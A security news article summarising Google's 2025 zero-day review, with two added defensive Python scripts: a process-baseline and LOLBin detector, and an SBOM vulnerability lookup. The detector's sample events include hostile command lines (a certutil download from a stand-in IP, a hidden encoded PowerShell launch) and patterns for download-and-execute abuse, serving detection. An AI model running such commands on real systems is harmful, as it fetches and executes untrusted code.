Google Tracks 90 Zero-Days Exploited in 2025 — Commercial Surveillance Vendors Now Outpace State Hackers
For the first time ever, commercial surveillance vendors were responsible for more zero-day exploitation than traditional state-sponsored cyber espionage groups. Google’s Threat Intelligence Group says the zero-day marketplace has fundamentally shifted — and 2026 will be worse.
The Numbers
Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in the wild in 2025, down from 2023’s record of 100 but up from 2024’s 78. The four-year trend is clear: zero-day exploitation has stabilized in the 60–100 range annually, a permanent escalation from pre-2021 levels.
The headline finding: more zero-day exploitation was attributed to commercial surveillance vendors (CSVs) than to any nation-state group, a first in GTIG’s tracking history. This isn’t a blip. It’s the culmination of a years-long trend in which spyware companies like Intellexa have made military-grade exploitation capabilities available to anyone willing to pay.
Enterprise Is the New Battleground
The enterprise numbers are staggering:
- 48% of all zero-days (43 vulnerabilities) targeted enterprise technologies — an all-time high
- Security and networking devices accounted for half of enterprise zero-days (21), with edge appliances like firewalls, VPNs, and routers serving as prime entry points
- Most edge devices lack EDR coverage entirely, creating persistent blind spots that threat actors ruthlessly exploit
“Edge devices sit at the perimeter of an organization’s infrastructure and remain high-value targets,” GTIG noted. “The absence of EDR technology on most edge devices can create a blind spot for defenders, making it an ideal attack surface.”
The vendors getting hit hardest: Cisco, Fortinet, Ivanti, and VMware — names that appear on virtually every enterprise network on the planet.
China Doubles Its Zero-Day Usage
PRC-nexus espionage groups remain the most prolific state-sponsored exploiters of zero-days, and they’re accelerating:
- 10 zero-days attributed to Chinese groups in 2025 — double the 2024 count
- Groups like UNC5221 and UNC3886 continued hammering edge and networking devices for persistent, difficult-to-detect access
- Evidence suggests Chinese operators are sharing exploits among separate groups at increasing speed, with the gap between public disclosure and widespread exploitation shrinking rapidly
The pattern is clear: China’s cyber-espionage apparatus is industrializing zero-day exploitation. Capabilities that used to be closely held by elite teams are now being distributed across multiple activity clusters.
Notably, no zero-days were attributed to North Korean actors in 2025, a sharp reversal from the five attributed to them in 2024.
The BRICKSTORM Problem: Stealing Code to Build More Zero-Days
One of the most alarming findings involves BRICKSTORM malware, linked to PRC-nexus operators. Rather than the data espionage groups usually go after, these attackers targeted intellectual property, including source code and proprietary development documents, at technology companies.
The implication is chilling: stolen source code can be analyzed to discover new vulnerabilities in the vendor’s software, creating a self-reinforcing cycle where today’s breach enables tomorrow’s zero-day. GTIG describes it as “a new paradigm for zero-day exploitation where data theft has the potential to enable long-term zero-day development.”
This isn’t just a threat to the companies breached. It’s a downstream threat to every customer running their software.
Mobile Exploitation Rebounds, Browsers Hold
Mobile zero-days surged to 15 in 2025, up from 9 in 2024, driven partly by increasingly complex exploit chains — some requiring three or more chained vulnerabilities to achieve desired access.
Browser exploitation, by contrast, fell to historical lows (under 10% of all zero-days), suggesting that browser hardening measures implemented over recent years are genuinely working. However, GTIG cautions that improved attacker operational security may also be hiding some activity.
Samsung’s Image Parsing Nightmare
A particularly noteworthy case involved Samsung devices: attackers exploited a vulnerability in Samsung’s Quram image parsing library (CVE-2025-21042) through malicious DNG image files sent via WhatsApp. The library runs unsandboxed within the com.samsung.ipservice process, meaning a single memory corruption bug granted attackers access to a phone’s entire photo and video library — a devastating capability for surveillance.
The bug was described as “both powerful and quite shallow,” with no control flow integrity mitigations compiled into the library.
Ransomware Groups Join the Zero-Day Club
Financially motivated groups exploited 9 zero-days in 2025, nearly tying the all-time high. Key incidents:
- FIN11/CL0P exploited zero-days in Oracle E-Business Suite (CVE-2025-61882 and CVE-2025-61884) as early as August 2025 in a massive extortion campaign
- UNC2165 (Evil Corp) used a zero-day (CVE-2025-8088) for initial access — the first time this group was observed doing so
- The same vulnerability was likely also exploited by CIGAR/RomCom, a Russian group conducting both financial and espionage operations
The message: zero-day exploitation is no longer reserved for nation-states. Ransomware affiliates are investing in — and deploying — these capabilities at scale.
SonicWall Full-Chain Exploit
GTIG also documented a sophisticated multi-stage exploit chain targeting SonicWall SMA 1000 series appliances, combining:
- An authentication bypass (CVE-2025-23006) to steal admin sessions
- A deserialization RCE to execute arbitrary commands
- A zero-day local privilege escalation (CVE-2025-40602) to reach root
The deserialization vulnerability had been silently patched in March 2024 without a CVE, meaning organizations that hadn’t updated were exposed for over a year without knowing it.
2026 Forecast: AI Accelerates Everything
GTIG’s outlook for 2026 is blunt:
“We anticipate that AI will accelerate the ongoing race between attackers and defenders in 2026, creating a more dynamic threat environment. We expect adversaries will utilize AI to automate and scale attacks by accelerating reconnaissance, vulnerability discovery, and exploit development.”
The compression of timelines — from vulnerability discovery to weaponized exploit — is the critical risk. Organizations that already struggle to patch within weeks will face adversaries who can develop exploits within days.
What Organizations Should Do Now
GTIG’s defensive recommendations emphasize preparation for inevitable compromise:
Architecture:
- Segment DMZ, firewalls, and VPNs from core network and domain controllers
- Monitor execution flow within applications to block unauthorized commands
- Don’t expose network ports to the internet unless strictly required
Detection:
- Enforce driver blocklists and flag anomalous kernel-level behavior
- Baseline system processes to detect Living off the Land activity
- Deploy canary tokens for high-fidelity lateral movement alerts
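The baselining recommendation above is easier to reason about with a concrete check in hand. The script below is an added example written for this page, not GTIG’s tooling: it carries a constructed parent/child process baseline and a handful of constructed process-creation events, then flags child processes that fall outside the baseline or whose command lines match known living-off-the-land argument patterns. The host names, events, baseline pairs and the 198.51.100.7 address are all made up.

```python
"""Flag off-baseline process trees and living-off-the-land command lines.

Added example for this page, not GTIG's tooling. The baseline pairs, the
process-creation events and the host names below are all constructed.
"""
import json
import re

# Constructed baseline: parent -> child pairs observed during a known-good
# period. In practice this is learned per host role from EDR/Sysmon telemetry.
BASELINE_PAIRS = {
    ("services.exe", "svchost.exe"),
    ("svchost.exe", "conhost.exe"),
    ("services.exe", "msiexec.exe"),
    ("explorer.exe", "outlook.exe"),
    ("explorer.exe", "winword.exe"),
}

# Argument patterns that turn signed Windows binaries into download/execute
# primitives. Matching is on the command line, not on the image name alone,
# because the binaries themselves are legitimate.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "bitsadmin.exe": re.compile(r"/transfer", re.I),
    "powershell.exe": re.compile(
        r"-e(nc|ncodedcommand)?\s|-nop\b|downloadstring|frombase64string|\biex\b",
        re.I,
    ),
}

# Constructed process-creation events (one JSON object per line), shaped like
# a trimmed-down EDR/Sysmon event: host, parent image, child image, command line.
EVENTS_JSONL = r'''
{"host": "web01", "parent": "svchost.exe", "image": "conhost.exe", "cmdline": "conhost.exe 0xffffffff"}
{"host": "web01", "parent": "w3wp.exe", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"}
{"host": "ws17", "parent": "explorer.exe", "image": "certutil.exe", "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"}
{"host": "ws17", "parent": "services.exe", "image": "msiexec.exe", "cmdline": "msiexec.exe /V"}
{"host": "ws17", "parent": "winword.exe", "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"}
'''


def parse_events(jsonl):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def analyze(events, baseline=BASELINE_PAIRS):
    """Return one alert per event that is off-baseline or matches a LOLBin pattern."""
    alerts = []
    for ev in events:
        parent = ev["parent"].lower()
        image = ev["image"].lower()
        reasons = []
        if (parent, image) not in baseline:
            reasons.append(f"off-baseline parent/child {parent} -> {image}")
        pattern = LOLBIN_PATTERNS.get(image)
        if pattern and pattern.search(ev.get("cmdline", "")):
            reasons.append(f"LOLBin argument pattern in {image}")
        if reasons:
            alerts.append({"host": ev["host"], "image": image, "reasons": reasons})
    return alerts


def run():
    """Analyze the constructed events and return the alerts."""
    return analyze(parse_events(EVENTS_JSONL))


if __name__ == "__main__":
    for alert in run():
        print(alert["host"], alert["image"], "; ".join(alert["reasons"]))
```

Two caveats a practitioner would attach to this: the baseline must be learned per host role (a web server spawning cmd.exe is suspicious; an admin jump host doing so may not be), and a pair-level baseline keyed on image names is blind to renamed or copied binaries, so production detections pair it with signer and hash checks on the child image.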
Response:
- Maintain a Software Bill of Materials (SBoM) to quickly locate affected libraries
- Establish emergency patching processes that bypass standard change management
- If no patch is available, isolate affected systems immediately
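The SBoM recommendation above only pays off if the lookup is done correctly when an advisory lands. The script below is an added example written for this page, not GTIG’s or any vendor’s tooling: it walks a constructed CycloneDX JSON SBOM, including components nested under an application entry, and matches a constructed advisory’s introduced/fixed version ranges with numeric rather than lexical version comparison. The component name imgparse, the versions and the advisory ranges are all hypothetical.

```python
"""Locate components affected by an advisory in a CycloneDX SBOM.

Added example for this page, not GTIG's or any vendor's tooling. The SBOM,
the component names and the advisory's version ranges are constructed.
"""
import json
import re

# Constructed CycloneDX 1.5 JSON SBOM. Note the component nested under the
# application: CycloneDX lets a component carry its own "components" list.
SBOM_JSON = r'''
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.5",
  "components": [
    {"type": "library", "name": "imgparse", "version": "2.10.0",
     "purl": "pkg:generic/imgparse@2.10.0"},
    {"type": "library", "name": "imgparse", "version": "3.0.4",
     "purl": "pkg:generic/imgparse@3.0.4"},
    {"type": "library", "name": "openssl", "version": "3.0.13",
     "purl": "pkg:generic/openssl@3.0.13"},
    {"type": "application", "name": "admin-console", "version": "12.4.0",
     "purl": "pkg:generic/admin-console@12.4.0",
     "components": [
       {"type": "library", "name": "imgparse", "version": "2.8.1",
        "purl": "pkg:generic/imgparse@2.8.1"}
     ]}
  ]
}
'''

# Constructed advisory in the introduced/fixed range style used by OSV-format
# advisories: vulnerable when introduced <= version < fixed.
ADVISORY = {
    "package": "imgparse",
    "ranges": [
        {"introduced": "2.0.0", "fixed": "2.9.0"},
        {"introduced": "3.0.0", "fixed": "3.0.5"},
    ],
}


def parse_version(version):
    """Turn '2.10.0' into (2, 10, 0) so comparison is numeric.

    A plain string compare would rank '2.10.0' below '2.9.0' and mis-flag
    components. Non-numeric suffixes such as '-rc1' are dropped, which is a
    simplification of real package version schemes.
    """
    parts = []
    for piece in re.split(r"[.\-+]", version):
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    return tuple(parts)


def version_in_range(version, introduced, fixed=None):
    """True when introduced <= version < fixed (fixed=None: no fix published)."""
    v, lo = parse_version(version), parse_version(introduced)
    hi = parse_version(fixed) if fixed else None
    width = max(len(v), len(lo), len(hi) if hi else 0)

    def pad(t):  # right-pad with zeros so 2.9 and 2.9.0 compare equal
        return t + (0,) * (width - len(t))

    if pad(v) < pad(lo):
        return False
    return hi is None or pad(v) < pad(hi)


def iter_components(node):
    """Yield every component, descending into nested component lists."""
    for comp in node.get("components", []):
        yield comp
        yield from iter_components(comp)


def find_affected(sbom, advisory):
    """Return the purls of components matching the advisory's package and ranges."""
    hits = []
    for comp in iter_components(sbom):
        if comp.get("name") != advisory["package"]:
            continue
        version = comp.get("version", "0")
        if any(version_in_range(version, r["introduced"], r.get("fixed"))
               for r in advisory["ranges"]):
            hits.append(comp["purl"])
    return sorted(hits)


def affected_purls():
    """Run the lookup against the constructed SBOM and advisory."""
    return find_affected(json.loads(SBOM_JSON), ADVISORY)


if __name__ == "__main__":
    for purl in affected_purls():
        print("affected:", purl)
```

The two details that matter in practice are both shown here: the nested copy of the library under admin-console is found because the walker recurses, and the 2.10.0 build is correctly left out because versions are compared as integer tuples rather than strings.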
The Bottom Line
The zero-day landscape has undergone a structural transformation. Commercial surveillance vendors have democratized access to capabilities once reserved for the world’s most sophisticated intelligence agencies. Enterprise infrastructure — particularly the edge devices organizations trust to protect their networks — has become the primary attack surface. And the feedback loop of stealing source code to develop future exploits means this problem is self-reinforcing.
Ninety zero-days in a single year is no longer an anomaly. It’s the new normal.
The full Google Threat Intelligence Group 2025 Zero-Day Review is available on Google Cloud’s blog, including detailed technical analyses of browser sandbox escapes, the SonicWall exploit chain, and Samsung DNG exploitation.